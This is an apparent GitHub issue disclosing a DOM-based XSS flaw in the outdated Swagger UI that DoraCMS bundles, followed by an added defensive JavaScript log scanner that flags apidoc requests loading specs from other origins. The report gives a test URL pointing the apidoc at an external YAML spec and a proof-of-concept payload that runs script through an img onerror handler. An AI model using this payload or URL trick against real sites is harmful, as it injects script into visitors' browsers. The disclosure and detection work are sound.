Open Lq0ne opened 4 months ago
Doracms uses an outdated version of Swagger to build the apidoc, which contains a known DOM-based XSS vulnerability. You can just add this parameter to the URL to test your site: https://[HOST]/static/apidoc/index.html?url=https://jumpy-floor.surge.sh/test.yaml
POC:
```yaml
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror=alert('xss')>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
```
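A defender-side check for the issue above, added here as an example and not part of the original report or the DoraCMS code base: it scans access logs for requests that point `/static/apidoc/index.html` at a spec on another origin through the `url` parameter. The log format, host names and function names are assumptions.

```javascript
// Added example: flag requests that point the bundled Swagger UI at a spec
// hosted on another origin. Log format and host names are constructed.
const APIDOC_PATH = '/static/apidoc/index.html';

// Returns the foreign spec URL if the request loads a spec from an origin
// other than siteOrigin, otherwise null.
function externalSpecUrl(requestTarget, siteOrigin) {
  let req;
  try {
    req = new URL(requestTarget, siteOrigin);
  } catch {
    return null; // unparseable request target
  }
  if (req.pathname !== APIDOC_PATH) return null;
  const raw = req.searchParams.get('url'); // percent-decoding is done here
  if (raw === null || raw === '') return null;
  let spec;
  try {
    spec = new URL(raw, siteOrigin); // relative values resolve to our own origin
  } catch {
    return raw; // malformed value: report it rather than ignore it
  }
  return spec.origin === new URL(siteOrigin).origin ? null : spec.href;
}

// Scans common-log-style lines and returns one finding per suspicious request.
function scanAccessLog(lines, siteOrigin) {
  const requestLine = /"(?:GET|HEAD) (\S+) HTTP\/[\d.]+"/;
  const findings = [];
  for (const line of lines) {
    const m = requestLine.exec(line);
    if (!m) continue;
    const spec = externalSpecUrl(m[1], siteOrigin);
    if (spec) findings.push({ client: line.split(' ')[0], spec });
  }
  return findings;
}

// Constructed sample log lines (documentation IP ranges, example hosts).
const SAMPLE_LOG = [
  '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /static/apidoc/index.html HTTP/1.1" 200 1432',
  '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /static/apidoc/index.html?url=/static/apidoc/api.yaml HTTP/1.1" 200 1432',
  '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /static/apidoc/index.html?url=https://spec.example.net/test.yaml HTTP/1.1" 200 1432',
  '203.0.113.9 - - [01/Jan/2024:10:02:40 +0000] "GET /static/apidoc/index.html?url=https%3A%2F%2Fspec.example.net%2Ft.yaml HTTP/1.1" 200 1432',
  '192.0.2.44 - - [01/Jan/2024:10:03:00 +0000] "GET /api/v1/content?url=https://spec.example.net/x HTTP/1.1" 200 88',
];

console.log(scanAccessLog(SAMPLE_LOG, 'https://cms.example.org'));
```

Only the query string reaches the server log, so this catches links of the form shown in the report; hits are a signal to investigate who followed the link, while the outdated Swagger build remains the thing to replace.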